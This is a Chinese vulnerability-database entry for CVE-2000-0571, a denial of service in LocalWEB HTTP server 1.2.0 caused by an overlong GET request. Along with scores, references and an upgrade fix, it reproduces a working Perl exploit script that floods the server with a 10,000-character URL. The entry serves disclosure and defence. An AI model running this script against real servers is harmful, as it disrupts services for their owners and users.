CVE-2000-0571
CVSS6.4
发布时间 :2000-07-05 00:00:00
修订时间 :2008-09-10 15:05:03
NMCOE    

[原文]LocalWEB HTTP server 1.2.0 allows remote attackers to cause a denial of service via a long GET request.


[CNNVD]LocalWEB HTTP缓冲区溢出漏洞(CNNVD-200007-011)

        LocalWEB HTTP server 1.2.0版本存在漏洞。远程攻击者可以借助超长GET请求导致服务拒绝。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0571
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0571
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200007-011
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/4896.php
(VENDOR_ADVISORY)  XF  localweb-get-bo
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-07-8&msg=NCBBKFKDOLAGKIAPMILPCEIHCFAA.labs@ussrback.com
(VENDOR_ADVISORY)  BUGTRAQ  20000703 Remote DoS Attack in LocalWEB HTTP Server 1.2.0 Vulnerability
http://www.securityfocus.com/bid/1423
(UNKNOWN)  BID  1423

- 漏洞信息

LocalWEB HTTP缓冲区溢出漏洞
中危 边界条件错误
2000-07-05 00:00:00 2005-05-02 00:00:00
远程※本地  
        LocalWEB HTTP server 1.2.0版本存在漏洞。远程攻击者可以借助超长GET请求导致服务拒绝。

- 公告与补丁

        
        West Street Software LocalWEB HTTP Server 1.2
        

- 漏洞信息 (20054)

West Street Software LocalWEB HTTP Server 1.2 Buffer Overflow (EDBID:20054)
windows dos
2000-07-04 Verified
0 Ussr Labs
N/A [点击下载]
source: http://www.securityfocus.com/bid/1423/info

LocalWEB is a freeware HTTP server for the Windows suite of operating systems. Certain versions of this software are vulnerable to a remotely exploitable buffer overflow attack. This attack can instrumented by sending the web server (via port 80) a malformed URL. The net result is a denial of service, however a remotely exploitable buffer overflow leading to a system compromise has not been ruled out. 


# ./$0.pl -s <server>
#
# Malformed GET URL request DoS
#
use Getopt::Std;
use Socket;

getopts('s:', \%args);
if(!defined($args{s})){&usage;}

my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);

$foo = "A"; # this is the NOP
$number = "10000"; # this is the total number of NOP
$data .= $foo x $number; # result of $foo times $number
$serv = $args{s}; # remote server
$port = 80; # remote port, default is 80
$buf = "GET /$data HTTP/1.0\r\n\r\n"; # issue this response to the
server

$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";

print("Data has been successfully sent to $serv\n");

sub usage {die("\n\n$0 -s <server>\n\n");} 
		

- 漏洞信息

1442
LocalWEB HTTP Long Get Request Parsing Remote Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability Upgrade
Exploit Public Third-party Verified

- 漏洞描述

LocalWEB HTTP contains a flaw that may allow a remote denial of service. The issue is triggered when overly long GET request is sent to server, and will result in loss of availability for the LocalWEB HTTP server.

- 时间线

2000-07-04 2000-06-04
2000-07-04 Unknow

- 解决方案

Upgrade to version 2.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站